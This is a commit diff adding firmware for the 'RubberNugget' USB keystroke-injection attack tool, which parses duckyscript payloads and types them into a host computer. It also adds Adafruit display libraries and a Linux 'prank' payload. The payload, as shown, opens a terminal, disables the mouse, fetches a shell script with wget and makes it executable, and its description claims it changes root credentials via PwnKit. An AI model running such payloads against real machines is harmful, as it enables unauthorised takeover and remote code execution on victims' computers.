Add support to act as a remote for a feathers2-ducky

switched from .dd to .txt duckyscript payloads for easier editing

Alex-Test/boot.py

@@ -0,0 +1,21 @@
+from board import *
+import digitalio
+import storage
+import board
+import time
+
+time.sleep(3)
+
+noStorageStatus = False
+noStoragePin = digitalio.DigitalInOut(board.IO18) ## If the down button is pressed on the S2 Nugget
+noStoragePin.switch_to_input(pull=digitalio.Pull.UP)
+noStorageStatus = not noStoragePin.value
+
+if(noStorageStatus == True):
+    # don't show USB drive to host PC
+    storage.disable_usb_drive()
+    print("Disabling USB drive")
+else:
+    # normal boot
+    print("USB drive enabled")
+# Write your code here :-)

Alex-Test/boot_out.txt

@@ -0,0 +1,4 @@
+Adafruit CircuitPython 7.2.3 on 2022-03-16; S2Mini with ESP32S2-S2FN4R2
+Board ID:lolin_s2_mini
+boot.py output:
+USB drive enabled

Alex-Test/code.py

@@ -0,0 +1,254 @@
+# RubberNugget HID Attack Tool
+# By Kody Kinzie & Alex Lynd
+# Optimized by Areza
+# Forked from https://github.com/dbisu/pico-ducky
+
+# import libraries
+import usb_hid, neopixel, board, busio, adafruit_displayio_sh1106, displayio, adafruit_framebuf, time, ssl, wifi, socketpool, ipaddress
+import adafruit_requests, adafruit_requests as requests, ampule, adafruit_binascii as binascii, terminalio, base64, os
+from adafruit_hid.keyboard import Keyboard
+from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS as KeyboardLayout
+from adafruit_hid.keycode import Keycode
+from digitalio import DigitalInOut, Pull
+from adafruit_debouncer import Debouncer
+from board import *
+from adafruit_display_text import label
+from adafruit_display_shapes.line import Line
+
+
+# display config for SH1106
+displayio.release_displays()
+WIDTH = 130 
+HEIGHT = 64
+BORDER = 1
+i2c = busio.I2C(SCL, SDA)
+display_bus = displayio.I2CDisplay(i2c, device_address=0x3c)
+display = adafruit_displayio_sh1106.SH1106(display_bus, width=WIDTH, height=HEIGHT)
+
+# use default font & white for font
+font = terminalio.FONT
+color = 0xFFFFFF
+
+
+# configure button input
+pins = (board.IO9, board.IO18, board.IO11, board.IO7)
+buttons = []       # will hold list of Debouncer objects
+for pin in pins:   # set up each pin
+    tmp_pin = DigitalInOut(pin) # defaults to input
+    tmp_pin.pull = Pull.UP      # turn on internal pull-up resistor
+    buttons.append( Debouncer(tmp_pin) )
+
+# keyboard config
+kbd = Keyboard(usb_hid.devices)
+layout = KeyboardLayout(kbd)
+
+# payload config & root dir
+payloadstatus  = ""
+defaultDelay = 0
+path = "payloads"
+
+
+# get pressed button
+def getButtonPressed():
+    for i in range(len(buttons)):
+        buttons[i].update()
+        if buttons[i].fell:
+            return i
+    return -1
+
+
+###### draw key map function ######
+
+def drawNavMap(map_vals):
+    global path
+    map = ["UP   ", "DOWN ", "LEFT ", "RIGHT"]
+    
+    #insert "back" as down value or blank values
+    if len(map_vals) <4:
+        for i in range (len(map_vals),4):
+            map_vals.insert(i,"")
+        map_vals.insert(1, "Back")
+    counter = 0
+    navScreen = displayio.Group()
+    
+    # iterate text values and add to screen
+    for i in map_vals[:4]:
+        text_area = label.Label(font, text=map[counter]+": "+i, color=color)
+        text_area.x = 2
+        text_area.y =3+(10*counter)
+        counter+=1
+        navScreen.append(text_area)
+
+    # draw stuff
+    navScreen.append(Line(0, 50, 127, 50, 0xFFFFFF))
+    navScreen.append(Line(0, 51, 127, 51, 0xFFFFFF))
+    text_area = label.Label(font, text="Dir: "+ path[path.rfind("/")+1:], color=color)
+    text_area.x = 2
+    text_area.y =57
+    navScreen.append(text_area)
+    display.show(navScreen)
+    
+    # update path until text file reached
+    currButton = -1
+    while (currButton== -1):
+        currButton = getButtonPressed()
+    if("Back" in map_vals and currButton==1):
+        path=path[0:path.rfind("/")]
+    elif (map_vals[currButton]==""):
+        pass
+    else :
+        path+="/"+map_vals[currButton]
+    if (".txt" in path):
+        runPayload(path)
+        path=path[0:path.rfind("/")]
+        path=path[0:path.rfind("/")]
+        
+
+##### draw and execute payload ######
+
+def drawPayload(status, payloadName):
+
+    # draw Nugget to indicate status!
+    
+    if (status=="START"):
+        statusText = "executing"
+        bitmap = displayio.OnDiskBitmap("/faces/payload-running.bmp")
+    else:
+        statusText = "finished"
+        bitmap = displayio.OnDiskBitmap("/faces/payload-finished.bmp")
+     # Setup the file as the bitmap data source
+    tile_grid = displayio.TileGrid(bitmap, pixel_shader=bitmap.pixel_shader)
+    
+    group = displayio.Group() # Create a Group to hold the TileGrid
+    group.append(tile_grid)
+    group.append(Line(0, 50, 129, 50, 0xFFFFFF))
+    group.append(Line(0, 51, 129, 51, 0xFFFFFF))
+    group.append(Line(0, 11, 129, 11, 0xFFFFFF))
+    group.append(Line(0, 12, 129, 12, 0xFFFFFF))
+    
+    text = ("STATUS: "+statusText)
+    text_area = label.Label(font, text=text, color=color)
+    text_area.x = 2
+    text_area.y =57
+    group.append(text_area)
+    text = (payloadName[path.rfind("/")+1:])
+    if(len(text)>21):
+        text = text[:18]+"..."
+
+    text_area = label.Label(font, text=text, color=color)
+    text_area.x = 2
+    text_area.y =3
+    group.append(text_area)
+    display.show(group)
+    time.sleep(3)
+
+# duckyscript command map
+
+duckyCommands = {
+    'WINDOWS': Keycode.WINDOWS, 'GUI': Keycode.GUI,
+    'APP': Keycode.APPLICATION, 'MENU': Keycode.APPLICATION, 'SHIFT': Keycode.SHIFT,
+    'ALT': Keycode.ALT, 'CONTROL': Keycode.CONTROL, 'CTRL': Keycode.CONTROL,
+    'DOWNARROW': Keycode.DOWN_ARROW, 'DOWN': Keycode.DOWN_ARROW, 'LEFTARROW': Keycode.LEFT_ARROW,
+    'LEFT': Keycode.LEFT_ARROW, 'RIGHTARROW': Keycode.RIGHT_ARROW, 'RIGHT': Keycode.RIGHT_ARROW,
+    'UPARROW': Keycode.UP_ARROW, 'UP': Keycode.UP_ARROW, 'BREAK': Keycode.PAUSE,
+    'PAUSE': Keycode.PAUSE, 'CAPSLOCK': Keycode.CAPS_LOCK, 'DELETE': Keycode.DELETE,
+    'END': Keycode.END, 'ESC': Keycode.ESCAPE, 'ESCAPE': Keycode.ESCAPE, 'HOME': Keycode.HOME,
+    'INSERT': Keycode.INSERT, 'NUMLOCK': Keycode.KEYPAD_NUMLOCK, 'PAGEUP': Keycode.PAGE_UP,
+    'PAGEDOWN': Keycode.PAGE_DOWN, 'PRINTSCREEN': Keycode.PRINT_SCREEN, 'ENTER': Keycode.ENTER,
+    'SCROLLLOCK': Keycode.SCROLL_LOCK, 'SPACE': Keycode.SPACE, 'TAB': Keycode.TAB,
+    'A': Keycode.A, 'B': Keycode.B, 'C': Keycode.C, 'D': Keycode.D, 'E': Keycode.E,
+    'F': Keycode.F, 'G': Keycode.G, 'H': Keycode.H, 'I': Keycode.I, 'J': Keycode.J,
+    'K': Keycode.K, 'L': Keycode.L, 'M': Keycode.M, 'N': Keycode.N, 'O': Keycode.O,
+    'P': Keycode.P, 'Q': Keycode.Q, 'R': Keycode.R, 'S': Keycode.S, 'T': Keycode.T,
+    'U': Keycode.U, 'V': Keycode.V, 'W': Keycode.W, 'X': Keycode.X, 'Y': Keycode.Y,
+    'Z': Keycode.Z, 'F1': Keycode.F1, 'F2': Keycode.F2, 'F3': Keycode.F3,
+    'F4': Keycode.F4, 'F5': Keycode.F5, 'F6': Keycode.F6, 'F7': Keycode.F7,
+    'F8': Keycode.F8, 'F9': Keycode.F9, 'F10': Keycode.F10, 'F11': Keycode.F11,
+    'F12': Keycode.F12,
+}
+
+###### ducky parser by @dbisu ######
+
+def convertLine(line):
+    newline = []
+    print(line)
+    # loop on each key - the filter removes empty values
+    for key in filter(None, line.split(" ")):
+        key = key.upper()
+        # find the keycode for the command in the list
+        command_keycode = duckyCommands.get(key, None)
+        if command_keycode is not None:
+            # if it exists in the list, use it
+            newline.append(command_keycode)
+        elif hasattr(Keycode, key):
+            # if it's in the Keycode module, use it (allows any valid keycode)
+            newline.append(getattr(Keycode, key))
+        else:
+            # if it's not a known key name, show the error for diagnosis
+            print(f"Unknown key: <{key}>")
+    print(newline)
+    return newline
+
+def runScriptLine(line):
+    for k in line:
+        kbd.press(k)
+    kbd.release_all()
+
+def sendString(line):
+    layout.write(line)
+
+def parseLine(line):
+    global defaultDelay
+    if(line[0:3] == "REM"):
+        # ignore ducky script comments
+        pass
+    elif(line[0:5] == "DELAY"):
+        time.sleep(float(line[6:])/1000)
+    elif(line[0:6] == "STRING"):
+        sendString(line[7:])
+    elif(line[0:13] == "DEFAULT_DELAY"):
+        defaultDelay = int(line[14:]) * 10
+    elif(line[0:12] == "DEFAULTDELAY"):
+        defaultDelay = int(line[13:]) * 10
+    else:
+        newScriptLine = convertLine(line)
+        runScriptLine(newScriptLine)
+
+###### payload run function ######
+
+def runPayload(payloadPath):
+    ##startup indicator
+    drawPayload("START",payloadPath)
+    f = open(payloadPath,"r",encoding='utf-8')
+    previousLine = ""
+    duckyScript = f.readlines()
+    for line in duckyScript:
+        print(line)
+        line = line.rstrip()
+        if(line[0:6] == "REPEAT"):
+            for i in range(int(line[7:])):
+                #repeat the last command
+                parseLine(previousLine)
+                time.sleep(float(defaultDelay)/1000)
+        else:
+            parseLine(line)
+            previousLine = line
+        time.sleep(float(defaultDelay)/1000)
+
+    ##finish indicator
+    drawPayload("STOP",payloadPath)
+    time.sleep(.5)
+
+# create default directories
+
+default_os = ["Windows","Starred","Mac","Linux"]
+for os_name in default_os:
+    if (os_name not in(os.listdir("payloads"))):
+    	os.mkdir(os_name)  	
+        
+while True:
+    # check for root payload directory
+    if (path!="payloads"):
+        drawNavMap(os.listdir(path)[:3]) # take first 3 items from list
+    else:
+        drawNavMap(os.listdir(path))

Alex-Test/lib/adafruit_display_shapes/line.py

@@ -0,0 +1,52 @@
+# SPDX-FileCopyrightText: 2019 Limor Fried for Adafruit Industries
+#
+# SPDX-License-Identifier: MIT
+
+"""
+`line`
+================================================================================
+
+Various common shapes for use with displayio - Line shape!
+
+
+* Author(s): Melissa LeBlanc-Williams
+
+Implementation Notes
+--------------------
+
+**Software and Dependencies:**
+
+* Adafruit CircuitPython firmware for the supported boards:
+  https://github.com/adafruit/circuitpython/releases
+
+"""
+
+from adafruit_display_shapes.polygon import Polygon
+
+__version__ = "0.0.0-auto.0"
+__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_Display_Shapes.git"
+
+
+class Line(Polygon):
+    # pylint: disable=too-many-arguments,invalid-name, too-few-public-methods
+    """A line.
+
+    :param x0: The x-position of the first vertex.
+    :param y0: The y-position of the first vertex.
+    :param x1: The x-position of the second vertex.
+    :param y1: The y-position of the second vertex.
+    :param color: The color of the line.
+    """
+
+    def __init__(self, x0, y0, x1, y1, color):
+        super().__init__([(x0, y0), (x1, y1)], outline=color)
+
+    @property
+    def color(self):
+        """The line color value. Can be a hex value for a color or
+        ``None`` for no line color."""
+        return self.outline
+
+    @color.setter
+    def color(self, color):
+        self.outline = color

Alex-Test/lib/adafruit_display_shapes/polygon.py

@@ -0,0 +1,136 @@
+# SPDX-FileCopyrightText: 2019 Limor Fried for Adafruit Industries
+#
+# SPDX-License-Identifier: MIT
+
+"""
+`polygon`
+================================================================================
+
+Various common shapes for use with displayio - Polygon shape!
+
+
+* Author(s): Melissa LeBlanc-Williams
+
+Implementation Notes
+--------------------
+
+**Software and Dependencies:**
+
+* Adafruit CircuitPython firmware for the supported boards:
+  https://github.com/adafruit/circuitpython/releases
+
+"""
+
+import displayio
+
+__version__ = "0.0.0-auto.0"
+__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_Display_Shapes.git"
+
+
+class Polygon(displayio.TileGrid):
+    # pylint: disable=too-many-arguments,invalid-name
+    """A polygon.
+
+    :param points: A list of (x, y) tuples of the points
+    :param outline: The outline of the polygon. Can be a hex value for a color or
+                    ``None`` for no outline.
+    """
+
+    def __init__(self, points, *, outline=None):
+        xs = []
+        ys = []
+
+        for point in points:
+            xs.append(point[0])
+            ys.append(point[1])
+
+        x_offset = min(xs)
+        y_offset = min(ys)
+
+        # Find the largest and smallest X values to figure out width for bitmap
+        width = max(xs) - min(xs) + 1
+        height = max(ys) - min(ys) + 1
+
+        self._palette = displayio.Palette(3)
+        self._palette.make_transparent(0)
+        self._bitmap = displayio.Bitmap(width, height, 3)
+
+        if outline is not None:
+            # print("outline")
+            self.outline = outline
+            for index, _ in enumerate(points):
+                point_a = points[index]
+                if index == len(points) - 1:
+                    point_b = points[0]
+                else:
+                    point_b = points[index + 1]
+                self._line(
+                    point_a[0] - x_offset,
+                    point_a[1] - y_offset,
+                    point_b[0] - x_offset,
+                    point_b[1] - y_offset,
+                    1,
+                )
+
+        super().__init__(
+            self._bitmap, pixel_shader=self._palette, x=x_offset, y=y_offset
+        )
+
+    # pylint: disable=invalid-name, too-many-locals, too-many-branches
+    def _line(self, x0, y0, x1, y1, color):
+        if x0 == x1:
+            if y0 > y1:
+                y0, y1 = y1, y0
+            for _h in range(y0, y1 + 1):
+                self._bitmap[x0, _h] = color
+        elif y0 == y1:
+            if x0 > x1:
+                x0, x1 = x1, x0
+            for _w in range(x0, x1 + 1):
+                self._bitmap[_w, y0] = color
+        else:
+            steep = abs(y1 - y0) > abs(x1 - x0)
+            if steep:
+                x0, y0 = y0, x0
+                x1, y1 = y1, x1
+
+            if x0 > x1:
+                x0, x1 = x1, x0
+                y0, y1 = y1, y0
+
+            dx = x1 - x0
+            dy = abs(y1 - y0)
+
+            err = dx / 2
+
+            if y0 < y1:
+                ystep = 1
+            else:
+                ystep = -1
+
+            for x in range(x0, x1 + 1):
+                if steep:
+                    self._bitmap[y0, x] = color
+                else:
+                    self._bitmap[x, y0] = color
+                err -= dy
+                if err < 0:
+                    y0 += ystep
+                    err += dx
+
+    # pylint: enable=invalid-name, too-many-locals, too-many-branches
+
+    @property
+    def outline(self):
+        """The outline of the polygon. Can be a hex value for a color or
+        ``None`` for no outline."""
+        return self._palette[1]
+
+    @outline.setter
+    def outline(self, color):
+        if color is None:
+            self._palette[1] = 0
+            self._palette.make_transparent(1)
+        else:
+            self._palette[1] = color
+            self._palette.make_opaque(1)

Alex-Test/lib/adafruit_display_shapes/triangle.py

@@ -0,0 +1,144 @@
+# SPDX-FileCopyrightText: 2019 Limor Fried for Adafruit Industries
+#
+# SPDX-License-Identifier: MIT
+
+"""
+`triangle`
+================================================================================
+
+Various common shapes for use with displayio - Triangle shape!
+
+
+* Author(s): Melissa LeBlanc-Williams
+
+Implementation Notes
+--------------------
+
+**Software and Dependencies:**
+
+* Adafruit CircuitPython firmware for the supported boards:
+  https://github.com/adafruit/circuitpython/releases
+
+"""
+
+from adafruit_display_shapes.polygon import Polygon
+
+__version__ = "0.0.0-auto.0"
+__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_Display_Shapes.git"
+
+
+class Triangle(Polygon):
+    # pylint: disable=too-many-arguments,invalid-name
+    """A triangle.
+
+    :param x0: The x-position of the first vertex.
+    :param y0: The y-position of the first vertex.
+    :param x1: The x-position of the second vertex.
+    :param y1: The y-position of the second vertex.
+    :param x2: The x-position of the third vertex.
+    :param y2: The y-position of the third vertex.
+    :param fill: The color to fill the triangle. Can be a hex value for a color or
+                 ``None`` for transparent.
+    :param outline: The outline of the triangle. Can be a hex value for a color or
+                    ``None`` for no outline.
+    """
+    # pylint: disable=too-many-locals
+    def __init__(self, x0, y0, x1, y1, x2, y2, *, fill=None, outline=None):
+        # Sort coordinates by Y order (y2 >= y1 >= y0)
+        if y0 > y1:
+            y0, y1 = y1, y0
+            x0, x1 = x1, x0
+
+        if y1 > y2:
+            y1, y2 = y2, y1
+            x1, x2 = x2, x1
+
+        if y0 > y1:
+            y0, y1 = y1, y0
+            x0, x1 = x1, x0
+
+        # Find the largest and smallest X values to figure out width for bitmap
+        xs = [x0, x1, x2]
+        points = [(x0, y0), (x1, y1), (x2, y2)]
+
+        # Initialize the bitmap and palette
+        super().__init__(points)
+
+        if fill is not None:
+            self._draw_filled(
+                x0 - min(xs), 0, x1 - min(xs), y1 - y0, x2 - min(xs), y2 - y0
+            )
+            self.fill = fill
+        else:
+            self.fill = None
+
+        if outline is not None:
+            self.outline = outline
+            for index, _ in enumerate(points):
+                point_a = points[index]
+                if index == len(points) - 1:
+                    point_b = points[0]
+                else:
+                    point_b = points[index + 1]
+                self._line(
+                    point_a[0] - min(xs),
+                    point_a[1] - y0,
+                    point_b[0] - min(xs),
+                    point_b[1] - y0,
+                    1,
+                )
+
+    # pylint: disable=invalid-name, too-many-branches
+    def _draw_filled(self, x0, y0, x1, y1, x2, y2):
+        if y0 == y2:  # Handle awkward all-on-same-line case as its own thing
+            a = x0
+            b = x0
+            if x1 < a:
+                a = x1
+            elif x1 > b:
+                b = x1
+
+            if x2 < a:
+                a = x2
+            elif x2 > b:
+                b = x2
+            self._line(a, y0, b, y0, 2)
+            return
+
+        if y1 == y2:
+            last = y1  # Include y1 scanline
+        else:
+            last = y1 - 1  # Skip it
+
+        # Upper Triangle
+        for y in range(y0, last + 1):
+            a = round(x0 + (x1 - x0) * (y - y0) / (y1 - y0))
+            b = round(x0 + (x2 - x0) * (y - y0) / (y2 - y0))
+            if a > b:
+                a, b = b, a
+            self._line(a, y, b, y, 2)
+        # Lower Triangle
+        for y in range(last + 1, y2 + 1):
+            a = round(x1 + (x2 - x1) * (y - y1) / (y2 - y1))
+            b = round(x0 + (x2 - x0) * (y - y0) / (y2 - y0))
+
+            if a > b:
+                a, b = b, a
+            self._line(a, y, b, y, 2)
+
+    # pylint: enable=invalid-name, too-many-locals, too-many-branches
+
+    @property
+    def fill(self):
+        """The fill of the triangle. Can be a hex value for a color or
+        ``None`` for transparent."""
+        return self._palette[2]
+
+    @fill.setter
+    def fill(self, color):
+        if color is None:
+            self._palette[2] = 0
+            self._palette.make_transparent(2)
+        else:
+            self._palette[2] = color
+            self._palette.make_opaque(2)

Alex-Test/lib/adafruit_displayio_sh1106.py

@@ -0,0 +1,115 @@
+# SPDX-FileCopyrightText: 2017 Scott Shawcroft, written for Adafruit Industries
+# SPDX-FileCopyrightText: Copyright (c) 2021 ladyada for Adafruit Industries
+#
+# SPDX-License-Identifier: MIT
+"""
+`adafruit_displayio_sh1106`
+================================================================================
+
+DisplayIO compatible library for SH1106 OLED displays
+
+
+* Author(s): ladyada
+
+Implementation Notes
+--------------------
+
+**Hardware:**
+
+**Software and Dependencies:**
+
+* Adafruit CircuitPython firmware for the supported boards:
+  https://github.com/adafruit/circuitpython/releases
+
+"""
+
+# imports
+import displayio
+
+__version__ = "0.0.0-auto.0"
+__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_DisplayIO_SH1106.git"
+
+
+# Sequence from sh1106 framebuf driver formatted for displayio init
+_INIT_SEQUENCE = (
+    b"\xae\x00"  # display off, sleep mode
+    b"\xd5\x01\x80"  # divide ratio/oscillator: divide by 2, fOsc (POR)
+    b"\xa8\x01\x3f"  # multiplex ratio = 64 (POR)
+    b"\xd3\x01\x00"  # set display offset mode = 0x0
+    b"\x40\x00"  # set start line
+    b"\xad\x01\x8b"  # turn on DC/DC
+    b"\xa1\x00"  # segment remap = 1 (POR=0, down rotation)
+    b"\xc8\x00"  # scan decrement
+    b"\xda\x01\x12"  # set com pins
+    b"\x81\x01\xff"  # contrast setting = 0xff
+    b"\xd9\x01\x1f"  # pre-charge/dis-charge period mode: 2 DCLKs/2 DCLKs (POR)
+    b"\xdb\x01\x40"  # VCOM deselect level = 0.770 (POR)
+    b"\x20\x01\x20"  #
+    b"\x33\x00"  # turn on VPP to 9V
+    b"\xa6\x00"  # normal (not reversed) display
+    b"\xa4\x00"  # entire display off, retain RAM, normal status (POR)
+    b"\xaf\x00"  # DISPLAY_ON
+)
+
+
+class SH1106(displayio.Display):
+    """
+    SH1106 driver for use with DisplayIO
+
+    :param bus: The bus that the display is connected to.
+    :param int width: The width of the display. Maximum of 132
+    :param int height: The height of the display. Maximum of 64
+    :param int rotation: The rotation of the display. 0, 90, 180 or 270.
+    """
+
+    def __init__(self, bus, **kwargs):
+        init_sequence = bytearray(_INIT_SEQUENCE)
+        super().__init__(
+            bus,
+            init_sequence,
+            **kwargs,
+            color_depth=1,
+            grayscale=True,
+            pixels_in_byte_share_row=False,  # in vertical (column) mode
+            data_as_commands=True,  # every byte will have a command byte preceeding
+            brightness_command=0x81,
+            single_byte_bounds=True,
+            # for sh1107 use column and page addressing.
+            #                lower column command = 0x00 - 0x0F
+            #                upper column command = 0x10 - 0x17
+            #                set page address     = 0xB0 - 0xBF (16 pages)
+            SH1107_addressing=True,
+        )
+        self._is_awake = True  # Display starts in active state (_INIT_SEQUENCE)
+
+    @property
+    def is_awake(self):
+        """
+        The power state of the display. (read-only)
+
+        `True` if the display is active, `False` if in sleep mode.
+        """
+        return self._is_awake
+
+    def sleep(self):
+        """
+        Put display into sleep mode. The display uses < 5uA in sleep mode.
+
+        Sleep mode does the following:
+
+            1) Stops the oscillator and DC-DC circuits
+            2) Stops the OLED drive
+            3) Remembers display data and operation mode active prior to sleeping
+            4) The MP can access (update) the built-in display RAM
+        """
+        if self._is_awake:
+            self.bus.send(int(0xAE), "")  # 0xAE = display off, sleep mode
+            self._is_awake = False
+
+    def wake(self):
+        """
+        Wake display from sleep mode
+        """
+        if not self._is_awake:
+            self.bus.send(int(0xAF), "")  # 0xAF = display on
+            self._is_awake = True

Alex-Test/lib/ampule.py

@@ -0,0 +1,132 @@
+import io
+import re
+
+BUFFER_SIZE = 256
+TIMEOUT = 30
+routes = []
+variable_re = re.compile("^<([a-zA-Z]+)>$")
+
+class Request:
+    def __init__(self, method, full_path):
+        self.method = method
+        self.path = full_path.split("?")[0]
+        self.params = Request.__parse_params(full_path)
+        self.headers = {}
+        self.body = None
+
+    @staticmethod
+    def __parse_params(path):
+        query_string = path.split("?")[1] if "?" in path else ""
+        param_list = query_string.split("&")
+        params = {}
+        for param in param_list:
+            key_val = param.split("=")
+            if len(key_val) == 2:
+                params[key_val[0]] = key_val[1]
+        return params
+
+
+def __parse_headers(reader):
+    headers = {}
+    for line in reader:
+        if line == b'\r\n': break
+        title, content = str(line, "utf-8").split(":", 1)
+        headers[title.strip().lower()] = content.strip()
+    return headers
+
+def __parse_body(reader):
+    data = bytearray()
+    for line in reader:
+        if line == b'\r\n': break
+        data.extend(line)
+    return str(data, "utf-8")
+
+def __read_request(client):
+    message = bytearray()
+    client.settimeout(30)
+    socket_recv = True
+
+    try:
+        while socket_recv:
+            buffer = bytearray(BUFFER_SIZE)
+            client.recv_into(buffer)
+            start_length = len(message)
+            for byte in buffer:
+                if byte == 0x00:
+                    socket_recv = False
+                    break
+                else:
+                    message.append(byte)
+    except OSError as error:
+        print("Error reading from socket", error)
+
+    reader = io.BytesIO(message)
+    line = str(reader.readline(), "utf-8")
+    (method, full_path, version) = line.rstrip("\r\n").split(None, 2)
+
+    request = Request(method, full_path)
+    request.headers = __parse_headers(reader)
+    request.body = __parse_body(reader)
+
+    return request
+
+def __send_response(client, code, headers, data):
+    headers["Server"] = "Ampule/0.0.1-alpha (CircuitPython)"
+    headers["Connection"] = "close"
+    headers["Content-Length"] = len(data)
+
+    response = "HTTP/1.1 %i OK\r\n" % code
+    for k, v in headers.items():
+        response += "%s: %s\r\n" % (k, v)
+    response += "\r\n" + data + "\r\n"
+
+    client.send(response)
+
+def __on_request(method, rule, request_handler):
+    regex = "^"
+    rule_parts = rule.split("/")
+    for part in rule_parts:
+        # Is this portion of the path a variable?
+        var = variable_re.match(part)
+        if var:
+            # If so, allow any alphanumeric value
+            regex += r"([a-zA-Z0-9_-]+)\/"
+        else:
+            # Otherwise exact match
+            regex += part + r"\/"
+    regex += "?$"
+    routes.append(
+        (re.compile(regex), {"method": method, "func": request_handler})
+    )
+
+def __match_route(path, method):
+    for matcher, route in routes:
+        match = matcher.match(path)
+        if match and method == route["method"]:
+            return (match.groups(), route)
+    return None
+
+def listen(socket):
+    try:
+        client, remote_address = socket.accept()
+        client.settimeout(1)
+
+        request = __read_request(client)
+        match = __match_route(request.path, request.method)
+        if match:
+            args, route = match
+            status, headers, body = route["func"](request, *args)
+            __send_response(client, status, headers, body)
+        else:
+            __send_response(client, 404, {}, "Not found")
+    except OSError as e:
+        print("Timed Out, continuing")
+        return
+    except BaseException as e:
+        print("Error with request:", e)
+        __send_response(client, 500, {}, "Error processing request")
+
+    client.close()
+
+def route(rule, method='GET'):
+    return lambda func: __on_request(method, rule, func)

Alex-Test/lib/neopixel.py

@@ -0,0 +1,188 @@
+# SPDX-FileCopyrightText: 2016 Damien P. George
+# SPDX-FileCopyrightText: 2017 Scott Shawcroft for Adafruit Industries
+# SPDX-FileCopyrightText: 2019 Carter Nelson
+# SPDX-FileCopyrightText: 2019 Roy Hooper
+#
+# SPDX-License-Identifier: MIT
+
+"""
+`neopixel` - NeoPixel strip driver
+====================================================
+
+* Author(s): Damien P. George, Scott Shawcroft, Carter Nelson, Rose Hooper
+"""
+
+# pylint: disable=ungrouped-imports
+import sys
+import board
+import digitalio
+from neopixel_write import neopixel_write
+
+try:
+    import adafruit_pixelbuf
+except ImportError:
+    try:
+        import _pixelbuf as adafruit_pixelbuf
+    except ImportError:
+        import adafruit_pypixelbuf as adafruit_pixelbuf
+
+
+try:
+    # Used only for typing
+    from typing import Optional, Type
+    from types import TracebackType
+    import microcontroller
+except ImportError:
+    pass
+
+
+__version__ = "0.0.0-auto.0"
+__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_NeoPixel.git"
+
+
+# Pixel color order constants
+RGB = "RGB"
+"""Red Green Blue"""
+GRB = "GRB"
+"""Green Red Blue"""
+RGBW = "RGBW"
+"""Red Green Blue White"""
+GRBW = "GRBW"
+"""Green Red Blue White"""
+
+
+class NeoPixel(adafruit_pixelbuf.PixelBuf):
+    """
+    A sequence of neopixels.
+
+    :param ~microcontroller.Pin pin: The pin to output neopixel data on.
+    :param int n: The number of neopixels in the chain
+    :param int bpp: Bytes per pixel. 3 for RGB and 4 for RGBW pixels.
+    :param float brightness: Brightness of the pixels between 0.0 and 1.0 where 1.0 is full
+      brightness
+    :param bool auto_write: True if the neopixels should immediately change when set. If False,
+      `show` must be called explicitly.
+    :param str pixel_order: Set the pixel color channel order. GRBW is set by default.
+
+    Example for Circuit Playground Express:
+
+    .. code-block:: python
+
+        import neopixel
+        from board import *
+
+        RED = 0x100000 # (0x10, 0, 0) also works
+
+        pixels = neopixel.NeoPixel(NEOPIXEL, 10)
+        for i in range(len(pixels)):
+            pixels[i] = RED
+
+    Example for Circuit Playground Express setting every other pixel red using a slice:
+
+    .. code-block:: python
+
+        import neopixel
+        from board import *
+        import time
+
+        RED = 0x100000 # (0x10, 0, 0) also works
+
+        # Using ``with`` ensures pixels are cleared after we're done.
+        with neopixel.NeoPixel(NEOPIXEL, 10) as pixels:
+            pixels[::2] = [RED] * (len(pixels) // 2)
+            time.sleep(2)
+
+    .. py:method:: NeoPixel.show()
+
+        Shows the new colors on the pixels themselves if they haven't already
+        been autowritten.
+
+        The colors may or may not be showing after this function returns because
+        it may be done asynchronously.
+
+    .. py:method:: NeoPixel.fill(color)
+
+        Colors all pixels the given ***color***.
+
+    .. py:attribute:: brightness
+
+        Overall brightness of the pixel (0 to 1.0)
+
+    """
+
+    def __init__(
+        self,
+        pin: microcontroller.Pin,
+        n: int,
+        *,
+        bpp: int = 3,
+        brightness: float = 1.0,
+        auto_write: bool = True,
+        pixel_order: str = None
+    ):
+        if not pixel_order:
+            pixel_order = GRB if bpp == 3 else GRBW
+        elif isinstance(pixel_order, tuple):
+            order_list = [RGBW[order] for order in pixel_order]
+            pixel_order = "".join(order_list)
+
+        self._power = None
+        if (
+            sys.implementation.version[0] >= 7
+            and getattr(board, "NEOPIXEL", None) == pin
+        ):
+            power = getattr(board, "NEOPIXEL_POWER_INVERTED", None)
+            polarity = power is None
+            if not power:
+                power = getattr(board, "NEOPIXEL_POWER", None)
+            if power:
+                try:
+                    self._power = digitalio.DigitalInOut(power)
+                    self._power.switch_to_output(value=polarity)
+                except ValueError:
+                    pass
+
+        super().__init__(
+            n, brightness=brightness, byteorder=pixel_order, auto_write=auto_write
+        )
+
+        self.pin = digitalio.DigitalInOut(pin)
+        self.pin.direction = digitalio.Direction.OUTPUT
+
+    def deinit(self) -> None:
+        """Blank out the NeoPixels and release the pin."""
+        self.fill(0)
+        self.show()
+        self.pin.deinit()
+        if self._power:
+            self._power.deinit()
+
+    def __enter__(self):
+        return self
+
+    def __exit__(
+        self,
+        exception_type: Optional[Type[BaseException]],
+        exception_value: Optional[BaseException],
+        traceback: Optional[TracebackType],
+    ):
+        self.deinit()
+
+    def __repr__(self):
+        return "[" + ", ".join([str(x) for x in self]) + "]"
+
+    @property
+    def n(self) -> int:
+        """
+        The number of neopixels in the chain (read-only)
+        """
+        return len(self)
+
+    def write(self) -> None:
+        """.. deprecated: 1.0.0
+
+        Use ``show`` instead. It matches Micro:Bit and Arduino APIs."""
+        self.show()
+
+    def _transmit(self, buffer: bytearray) -> None:
+        neopixel_write(self.pin, buffer)

Alex-Test/payloads/Linux/prank/PwnKit_Cred_Changer (4th copy).txt

@@ -0,0 +1,34 @@
+REM Title: PwnKit Cred Changer
+REM Author: Alex Lynd
+REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload.
+REM Target: Linux (Bash)
+REM Props: Hak5, HakCat
+REM Version: 1.0
+REM Category: Prank
+
+CTRL ALT T
+DELAY 2000
+
+REM disable mouse
+STRING xinput float 12
+ENTER
+
+
+REM download annoying payload
+
+REM STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh
+ENTER
+DELAY 1000
+STRING chmod +x linux-color-flasher.sh 
+ENTER
